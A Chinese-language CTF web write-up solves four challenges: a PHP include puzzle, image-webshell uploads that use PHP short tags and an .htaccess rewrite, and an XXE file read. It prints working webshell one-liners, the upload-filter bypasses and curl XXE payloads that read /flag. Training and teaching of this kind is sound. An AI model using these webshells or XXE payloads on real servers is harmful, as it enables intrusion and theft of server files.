ctfweb:php/php短标签/.haccess+图片马/XXE

[玄武杯 2025]ez_include

先来看一下这段代码具体的作用

首先,stream_wrapper_unregister函数移除了php://输入输出流,也就是我们没法用pgp://filter只r不x了

然后是一个高光设计,之后代码用随机函数得到了一个随机十六个字符的文件名,在users下随机创建文件夹,再cd过去,根据客户端 IP 地址生成一个合法的目录名,用于为每个访问者创建独立的临时文件夹,然后将服务器环境信息保存到该目录下的profile文件中,用于记录访问日志,最后,递归删除创建的文件夹

然后进行安全性测试:

  • 把page参数里的 '.' 删掉
  • 检查要访问的目标文件是否包含<?,php

直接测试参数?page=flag

[LitCTF 2025]easy_file

进去之后是登录页,看一下源码有个注释:

这里直接尝试admin&password就进了

上传图片马被拦截,有内容检测<?php,用php短标签代替

复制代码
echo GIF89a > normal.jpg
echo ^<?= system($_GET["cmd"]); ?^> >> normal.jpg

根据刚才源码提示找到文件位置,进而进行命令执行

[GHCTF 2025]UPUPUP

先尝试上传一句话木马,尝试失败

学习.gtaccess:通过.htaccess可重写解析规则,使任意扩展名文件以PHP执行

于是思路如下:先传入.htaccess,再传入图片马,使得图片马被执行

复制代码
echo GIF89a; ^<?php system($_REQUEST["cmd"]); ^?^> >> normal.jpg

然后改名为shell.jpg

normal改名为shell.jpg,上传

尝试payload:?cmd=cat flag,回显成功

[GHCTF 2025](>﹏<)

源码中存在 XXE 漏洞:

  • load_dtd=True:允许加载外部 DTD

  • resolve_entities=True:允许解析实体

先确认接口是否正常:

复制代码
curl -X POST http://node1.anna.nssctf.cn:22718/ghctf -d 'xml=<root><name>test</name></root>'
复制代码
curl -X POST http://node1.anna.nssctf.cn:22718/ghctf --data-urlencode 'xml=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test "hello">]><root><name>&test;</name></root>'

注意: 必须使用 --data-urlencode,否则 & 符号会被 shell 错误解析。

复制代码
curl -X POST http://node1.anna.nssctf.cn:22718/ghctf --data-urlencode 'xml=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY b SYSTEM "file:///flag">]><root><name>&b;</name></root>'
相关推荐
爱上好庆祝1 小时前
学习js的第七天(wed APIs的开始)
前端·javascript·css·学习·html·css3
yong99902 小时前
MATLAB读取高光谱图像
开发语言·matlab
2zcode2 小时前
基于MATLAB的肝病风险评估与分期分析系统设计与实现
开发语言·matlab
KaMeidebaby2 小时前
卡梅德生物技术快报|冻干工艺开发:注射用心肌肽全流程参数优化与工程化方案
前端·其他·百度·新浪微博
小小de风呀2 小时前
de风——【从零开始学C++】(五):内存管理
开发语言·c++
ooseabiscuit2 小时前
Laravel6.x核心优化与特性全解析
android·开发语言·javascript
折哥的程序人生 · 物流技术专研2 小时前
Java面试85题图解版(一):基础核心篇
java·开发语言·后端·面试
Moment3 小时前
面试官:如果产品经理给你多个需求,怎么让AI去完成❓❓❓
前端·后端·面试
每天吃饭的羊3 小时前
JSONP
前端